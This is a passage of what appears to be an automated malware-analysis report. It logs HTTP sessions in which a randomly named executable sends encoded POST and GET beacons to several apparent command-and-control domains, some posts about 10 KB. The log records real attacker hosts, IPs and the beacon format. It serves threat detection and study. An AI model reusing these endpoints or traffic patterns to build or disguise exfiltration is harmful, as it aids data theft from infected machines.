                      Data Raw: 63 68 48 54 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 51 2f 48 6a 62 4d 32 6c 51 44 30 34 63 63 37 4b 6d 30 5a 4c 2f 47 47 58 76 6d 49 53 71 49 4b 42 31 39 74 43 6f 36 56 79 52 70 69 69 2f 46 42 64 35 4d 66 74 4c 62 6d 69 66 4d 46 43 78 48 33 61 6c 46 69 33 55 34 65 47 55 52 77 41 77 4a 38 68 48 5a 54 31 4b 2f 31 49 51 56 58 65 55 6c 6a 4e 2b 44 49 56 34 58 61 6e 52 6e 52 72 58 6e 71 49 78 64 55 6e 6a 56 6a 61 44 52 6e 44 77 63 2b 48 53 4f 6b 39 35 50 79 6a 4a 42 37 72 36 6e 61 77 57 33 44 66 47 53 7a 38 48 47 39 42 79 68 6b 79 74 30 63 78 41 47 65 71 6a 71 65 33 45 72 6f 6a 56 63 43 67 50 78 65 4c 57 34 34 49 57 49 2b 35 73 34 53 6b 6c 63 67 43 33 65 50 4c 38 54 77 79 4c 39 7a 56 6b 79 78 50 54 51 66 4c 63 73 5a 42 4f 68 70 5a 7a 55 4f 59 54 69 54 4c 4e 46 45 67 34 6a 63 6b 69 70 45 34 41 46 2f 4d 6a 51 58 6c 47 69 59 31 68 2b 62 71 32 4a 59 4c 6d 37 30 39 76 46 5a 55 4e 66 45 4f 32 64 51 75 39 67 79 75 75 43 41 [TRUNCATED]
                      Data Ascii: chHT= [TRUNCATED]
Sep 10, 2024 08:48:34.566261053 CEST | 360 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:48:34 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 89.58.49.1 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
Timestamp | Bytes transferred | Direction | Data
Sep 10, 2024 08:48:36.390650034 CEST | 465 | OUT | GET /xcfw/?chHT=bjW1F6zberoR1D3Y/XEIKVRbrrv+ro5pHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFAwVPxBpt2RsyemRiOMSAY7rdemSMqYxcM/3o=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.freepicture.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Sep 10, 2024 08:48:37.031356096 CEST | 360 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:48:36 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 154.23.184.240 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
Timestamp | Bytes transferred | Direction | Data
Sep 10, 2024 08:48:50.513559103 CEST | 713 | OUT | POST /p39s/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Referer: http://www.hm62t.top/p39s/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 63 6f 68 45 76 31 4f 2f 71 41 6a 66 4d 41 59 76 34 57 39 52 38 6c 53 70 4a 62 74 48 72 59 61 35 76 64 67 46 76 32 64 48 49 5a 33 4f 77 33 54 4c 45 2f 54 41 41 76 70 50 4c 2f 47 49 41 38 34 30 4f 36 76 71 38 73 30 73 62 4e 44 34 6a 7a 33 48 51 43 65 66 61 54 32 6a 32 33 67 5a 67 66 79 79 50 7a 63 59 56 6c 48 48 4b 69 47 76 52 62 39 4b 6f 5a 61 56 4c 45 4f 4a 43 4f 64 4c 32 76 2b 35 49 56 61 39 69 50 52 55 72 54 74 76 5a 7a 72 56 61 35 52 4d 2b 4c 6c 54 66 71 72 78 70 2f 63 52 65 37 77 59 50 61 54 6c 6c 79 31 5a 58 33 6c 30 6e 33 68 63 41 3d 3d
                      Data Ascii: chHT=4PVtP2BQg8qzhcohEv1O/qAjfMAYv4W9R8lSpJbtHrYa5vdgFv2dHIZ3Ow3TLE/TAAvpPL/GIA840O6vq8s0sbND4jz3HQCefaT2j23gZgfyyPzcYVlHHKiGvRb9KoZaVLEOJCOdL2v+5IVa9iPRUrTtvZzrVa5RM+LlTfqrxp/cRe7wYPaTlly1ZX3l0n3hcA==
Sep 10, 2024 08:48:51.390253067 CEST | 312 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:51 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49743 | 154.23.184.240 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
Timestamp | Bytes transferred | Direction | Data
Sep 10, 2024 08:48:53.119609118 CEST | 733 | OUT | POST /p39s/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Referer: http://www.hm62t.top/p39s/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 65 41 61 35 4e 56 67 45 74 65 64 47 49 5a 33 46 51 33 53 47 6b 2f 45 41 41 69 55 50 4b 54 47 49 41 6f 34 30 50 4b 76 72 50 45 31 74 4c 4e 42 30 44 7a 31 4a 77 43 65 66 61 54 32 6a 32 53 46 5a 67 58 79 79 66 6a 63 65 78 78 47 45 4b 69 48 6d 78 62 39 64 34 5a 57 56 4c 45 6f 4a 42 4b 6e 4c 31 58 2b 35 4e 35 61 7a 54 50 53 64 72 54 72 78 70 79 58 57 61 73 4f 41 2b 2b 62 65 70 43 51 38 61 54 62 51 59 71 71 4a 2b 37 45 33 6c 57 47 45 51 2b 52 35 6b 4b 6f 48 4c 5a 64 74 75 2b 68 46 49 63 70 43 57 7a 64 4b 36 73 76 6e 75 67 3d
                      Data Ascii: chHT=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHeAa5NVgEtedGIZ3FQ3SGk/EAAiUPKTGIAo40PKvrPE1tLNB0Dz1JwCefaT2j2SFZgXyyfjcexxGEKiHmxb9d4ZWVLEoJBKnL1X+5N5azTPSdrTrxpyXWasOA++bepCQ8aTbQYqqJ+7E3lWGEQ+R5kKoHLZdtu+hFIcpCWzdK6svnug=
                      Sep 10, 2024 08:48:54.016617060 CEST | 312 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:53 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.4 | 49744 | 154.23.184.240 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:48:55.660487890 CEST | 10815 | OUT | POST /p39s/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Referer: http://www.hm62t.top/p39s/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 64 67 61 35 2b 4e 67 47 4d 65 64 55 59 5a 33 47 51 33 50 47 6b 2f 5a 41 44 54 54 50 4b 50 57 49 43 51 34 33 74 79 76 69 61 77 31 6b 4c 4e 42 70 54 7a 34 48 51 43 4c 66 61 69 2b 6a 32 69 46 5a 67 58 79 79 61 6e 63 64 6c 6c 47 49 71 69 47 76 52 61 38 4b 6f 59 2f 56 4c 64 54 4a 41 2f 59 49 46 33 2b 36 74 70 61 78 6c 62 53 53 72 54 70 77 70 79 50 57 61 77 72 41 2b 6a 71 65 74 4b 36 38 5a 50 62 54 73 7a 4c 54 50 2b 62 74 57 53 44 57 6a 53 57 34 69 66 72 4a 70 78 53 73 4f 47 62 66 72 34 30 4d 31 43 48 64 5a 6b 4e 6b 35 69 76 67 44 69 66 4e 47 59 5a 50 54 6f 32 63 79 33 77 31 35 61 49 70 78 33 67 4c 5a 79 47 63 39 4e 57 4b 44 66 78 64 49 6c 71 50 53 68 46 6d 6d 53 6d 76 31 6e 4a 54 33 73 54 68 2b 50 30 52 4e 53 43 67 30 59 31 38 43 61 4a 33 55 37 6d 35 32 47 58 57 49 58 31 48 37 65 71 6d 37 35 77 30 48 32 67 75 56 79 39 73 6c 2f 34 6d 61 39 69 4c 7a 64 6d 4d 77 50 4b 44 [TRUNCATED]
                      Data Ascii: chHT=[TRUNCATED]
                      Sep 10, 2024 08:48:56.845432043 CEST | 312 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:56 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Sep 10, 2024 08:48:56.845750093 CEST | 312 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:56 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.4 | 49745 | 154.23.184.240 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:48:58.201013088 CEST | 456 | OUT | GET /p39s/?chHT=1N9NMDNpm9Czos0vDuAaxfkyacdu5dmrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV81dYi+UjaGlO+WfnitkWEaBCkm6SMdBoGO9M=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.hm62t.top
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:48:59.098756075 CEST | 312 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:58 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.4 | 49746 | 85.159.66.93 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:04.313524961 CEST | 746 | OUT | POST /k2vl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.golbasi-nakliyat.xyz
                      Origin: http://www.golbasi-nakliyat.xyz
                      Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Ascii: chHT=ezGJx9beP/VwBeloFSMaV/Gn2HJ+ulEpAR9Nax2OfCGXOnbmjfBp6n7m4jyyMpfV/cq7Hv+aDYGTcpTVWa9tdIQZYvFc0yUi3KehRqU/4zQnUC5vNVUTVg7uA7M3ETVVCtBjPirup8SVLjXBHxQYx8hDHtbdX+5Z7iWCbSEQiBYsfwKZYkXCdxmCL1HX5tm0og==


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.4 | 49747 | 85.159.66.93 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:06.964118004 CEST | 766 | OUT | POST /k2vl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.golbasi-nakliyat.xyz
                      Origin: http://www.golbasi-nakliyat.xyz
                      Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Ascii: chHT=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxiXNFDmieBp5n7mqDy3R5fe/c2zHvyaDYSTcoPVWplqdYQbQPFNwyUi3KehRqQG4zYnUzJvP3wULQ7xJbM3OzVRCtA2PmrUp6WVLinBHgQb+8hFa9a5ac0H+w34RxIzlxcuXWbDJV2VPxCxWyOj0ub9zgLZZ30a4NrwMX/FBJU+3Fo=


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.4 | 49748 | 85.159.66.93 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:09.505068064 CEST | 10848 | OUT | POST /k2vl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.golbasi-nakliyat.xyz
                      Origin: http://www.golbasi-nakliyat.xyz
                      Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Ascii: chHT=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxqXNwXmi95p4n7mxDy2R5fD/cu3HvOwDbqTOarVBMRqSYQbSPFd0yUS3KOtRqAG4zYnUwRvIlUUJQ7uA7MBETV1CtomPmvEoK2VLC3BUi4bz8hHZ9ahac4m+wbFRyUJlzAuUQa+Vh+faCCZAwvD9PP73Hf9fkkyl97eXlmvasImoijShTVaW+70g6ZaDVfleoCok/4TOQsjdN4CnhF2I9Uwj+WTk1GCaOjGsUltDY+TTWC+iU8hP899vCwKQzSagQlvuIMAkFk83aG7//KKhPGuI9YqiVJ+wR5A3JwgAwY8olLITXqqhXvSE8/hqHB6FeP5KojKVQKvOdZxBkbVKPv8+bQJ86WkJX03hXxWlSQR3f8NyevsZ1/lZONlLGk4cA4y75KY6KZKeMskkxmbwEqGHmCcZQTttn1VzWFqwMnmm57d+8O7W/2YUXZC+ESaMRYVvaOVjUbt5Bn2tA1Di8AfN0Ev/X8Yp7MfoMV1BGDSkkFOmiJRba5h2X+VS3NnsLRRomtN4+dekdRuRguMGvEJJ5EsGCigYbtNwnr6X7Q/iUZOH1CzQlX5w6UiQ23Wi40onxD9Z9Q39/p6qTVlHMkSXSLJurphgUxLgR+XDYe0rfeJwV+o9s5e36DcGuZrt7hGVmIqksJU4F8H/Fyfvkdrq9HRBNOEHMNKcAV07gUudxYNDh/Hgpb0UCqApVMLKKbjTMzrW7QZ4USFO4lLYNP4gi+Y9opG1ku6b3If3lULfcn2AM/UD9iu0vl9T9YYmlbQpgTwxWJmHv23dnOZPtYlFsV/hFcBlgUPglSmhae5ERs48UNIu8vCBIfKb2p6Vexs7ZNwXnWuGXNdXTRXKgDAcKX34mJnTfeQ1bp+ITsLMJQGzk9n5GGbxihNYqPcRRA3/ZxIHBONIxzwBp4WTr8+BbCeNPpMTr9GQ+8JLNMJV42LcZrg3YVcN3IbavRbgoF0afS [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.4 | 49749 | 85.159.66.93 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:12.050884008 CEST | 467 | OUT | GET /k2vl/?chHT=TxupyKnRMohPPcJUOXYiFfym6FYb3U4dGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bNPEHR5AP8gY607qfZYhRyRQHcihpFxABXgI=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.golbasi-nakliyat.xyz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:49:12.745553970 CEST | 225 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.14.1
                      Date: Tue, 10 Sep 2024 06:49:12 GMT
                      Content-Length: 0
                      Connection: close
                      X-Rate-Limit-Limit: 5s
                      X-Rate-Limit-Remaining: 19
                      X-Rate-Limit-Reset: 2024-09-10T06:49:17.6317063Z


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      13 | 192.168.2.4 | 49750 | 185.173.111.76 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:18.214747906 CEST | 740 | OUT | POST /lwt6/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mfgamecompany.shop
                      Origin: http://www.mfgamecompany.shop
                      Referer: http://www.mfgamecompany.shop/lwt6/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Ascii: chHT=u91ZDexvlNKHJOAZzUvgxOWS4RyU1HYo0/HRP18R94hEjQc7alFzT+rQ5IbkS1BE/6voDOaFD32kH/V7S+l7FW404mD1DfET7kcDfMiOBQ5PLnLLR69gOvpmvwSufhqb5nLzKuo3BwG1MdlhD6jaUbP5wZWkTGOWvHMctNmGP9s43tGjpJ+GGQ9jWQfHxU2Keg==
                      Sep 10, 2024 08:49:18.882579088 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                      Connection: close
                      content-type: text/html
                      content-length: 795
                      date: Tue, 10 Sep 2024 06:49:18 GMT
                      server: LiteSpeed
                      location: https://www.mfgamecompany.shop/lwt6/
                      platform: hostinger
                      panel: hpanel
                      content-security-policy: upgrade-insecure-requests
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      14 | 192.168.2.4 | 49751 | 185.173.111.76 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:20.907115936 CEST | 760 | OUT | POST /lwt6/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mfgamecompany.shop
                      Origin: http://www.mfgamecompany.shop
                      Referer: http://www.mfgamecompany.shop/lwt6/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Ascii: chHT=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LVEg147bhZzG+rQh4auW1BL/6qfDMeFDzekH9N7TJ50FG42xGD3J/ET7kcDfNHrBQhPLX7LRYVjIfplmQSubhqf5nLRKuYRB1a1McVhCvXddbOwtJXndHnliW5ssrq+C/s9yrX544fRUQZQLXWz8XLDFjvmcFFjuNqAPdKdMOxFOus=
                      Sep 10, 2024 08:49:21.558152914 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                      Connection: close
                      content-type: text/html
                      content-length: 795
                      date: Tue, 10 Sep 2024 06:49:21 GMT
                      server: LiteSpeed
                      location: https://www.mfgamecompany.shop/lwt6/
                      platform: hostinger
                      panel: hpanel
                      content-security-policy: upgrade-insecure-requests
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      15 | 192.168.2.4 | 49752 | 185.173.111.76 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:23.460412979 CEST | 10842 | OUT | POST /lwt6/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mfgamecompany.shop
                      Origin: http://www.mfgamecompany.shop
                      Referer: http://www.mfgamecompany.shop/lwt6/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
